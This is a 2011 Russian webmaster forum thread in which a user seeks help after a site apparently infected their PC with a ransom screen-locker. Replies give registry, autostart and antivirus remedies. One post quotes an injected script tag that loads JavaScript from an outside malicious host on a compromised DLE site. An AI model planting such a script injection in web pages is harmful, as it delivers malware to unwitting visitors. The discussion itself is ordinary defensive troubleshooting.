X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Вирус?
Gad3000
Gad3000
Topic Starter сообщение 12.1.2011, 18:32; Ответить: Gad3000
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 816
Регистрация: 26.4.2009
Поблагодарили: 160 раз
Репутация:   28  


Добрый вечер. Вчера хотел скачать шаблон с сайта, но вдруг завис браузер, загрузился java, выскочила иконка, блокирующая все действия за ней, с просьбой отослать на какой-то номер 300р. Перезагрузил компьютер через кнопку. Нет рабочего стола, только обои. Сразу после загрузке открывается папка мои документы. Проверил антивирусом - ничего не обнаружил.
Скорей всего сайт templatehere.com (не переходить!!!)
Что делать? Спасибо.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
JohnD
JohnD
сообщение 12.1.2011, 18:42; Ответить: JohnD
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 250
Регистрация: 2.4.2009
Из: Санкт-Петербург
Поблагодарили: 98 раз
Репутация:   9  


Запустить диспетчер задач (Ctrl+alt+del), на вкладки "приложения" нажать кнопку "новая задача", ввести "explorer.exe" без ковычек и ОК. Должен появиться рабочий стол. Дальше проверять на вирусы (drweb cureit, kaspersky).
Попробуйте!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Gad3000
Gad3000
Topic Starter сообщение 12.1.2011, 18:47; Ответить: Gad3000
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 816
Регистрация: 26.4.2009
Поблагодарили: 160 раз
Репутация:   28  


JohnD, спасибо, но не все так просто. Пробовал уже, открывается 2-й раз "мои документы"
Касперским проверял, ничего не дало.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
JohnD
JohnD
сообщение 12.1.2011, 18:53; Ответить: JohnD
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 250
Регистрация: 2.4.2009
Из: Санкт-Петербург
Поблагодарили: 98 раз
Репутация:   9  


Попробуйте, заменить explorer.exe на другой из дистрибутива или для той же версии windows, может что изменится!

Проверить пути в реестре:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
если есть параметр explorer.exe, то его нужно удалить.

HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon\ Shell" должен быть "Explorer.exe

Перезагрузиться!

Сообщение отредактировал JohnD - 12.1.2011, 19:06
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
wagan
wagan
сообщение 12.1.2011, 18:55; Ответить: wagan
Сообщение #5


Участник
***

Группа: User
Сообщений: 158
Регистрация: 27.12.2010
Из: м.о. Люберцы
Поблагодарили: 49 раз
Репутация:   11  


Эта хрень в автозагрузке, всё отключить и систему назад
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
v1rusmj
v1rusmj
сообщение 12.1.2011, 18:56; Ответить: v1rusmj
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 4.8.2010
Поблагодарили: 126 раз
Репутация:   27  


Dr. web Cureit Вам в помощь
Находит самое не находимое smile.gif

Клик
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
wagan
wagan
сообщение 12.1.2011, 19:00; Ответить: wagan
Сообщение #7


Участник
***

Группа: User
Сообщений: 158
Регистрация: 27.12.2010
Из: м.о. Люберцы
Поблагодарили: 49 раз
Репутация:   11  


(v1rusmj @ 12.1.2011, 17:56) *
Dr. web Cureit Вам в помощь
Находит самое не находимое smile.gif

Клик

Это ненайдёт, я их каждый день вывожу smile.gif , делайте как говорю
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Hallboy222
Hallboy222
сообщение 12.1.2011, 19:06; Ответить: Hallboy222
Сообщение #8


Любитель идей
*******


Группа: Active User
Сообщений: 2582
Регистрация: 27.5.2010
Из: Москва
Поблагодарили: 872 раза
Репутация:   149  


Вы точно уверены, что именно с этого сайта вирус подхватили?
То есть теперь взломщики (сайт на дле и в каждой новости присутствует <script src="http://www.karbrrbrr.co.cc/1274b547e66b7ad17a5da83f12ef54a5.js" type="text/javascript"></script>) подгружают вирус, а не рекламу!

kaspersky поможет удалить эту "бяку".
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Вирус на службе маркетинга
2 jack 644 9.10.2017, 19:33
автор: jack
Открытая тема (нет новых ответов) Помогите удалить вирус на joomla 1.5
Готов оплатить помощь.
5 pulsar21 2002 17.5.2013, 8:00
автор: pulsar21
Открытая тема (нет новых ответов) Найти вирус и удалить.
3 Minato 1070 2.2.2013, 20:24
автор: EvilGomel
Открытая тема (нет новых ответов) Вирус в DLE. Уничтожить за плату.
4 Seo-optimist 1788 30.12.2010, 15:23
автор: bobur
Открытая тема (нет новых ответов) вирус на сайте
5 RazBoy 2310 12.5.2010, 6:36
автор: viitalik


 



RSS Текстовая версия Сейчас: 15.12.2017, 18:23
Дизайн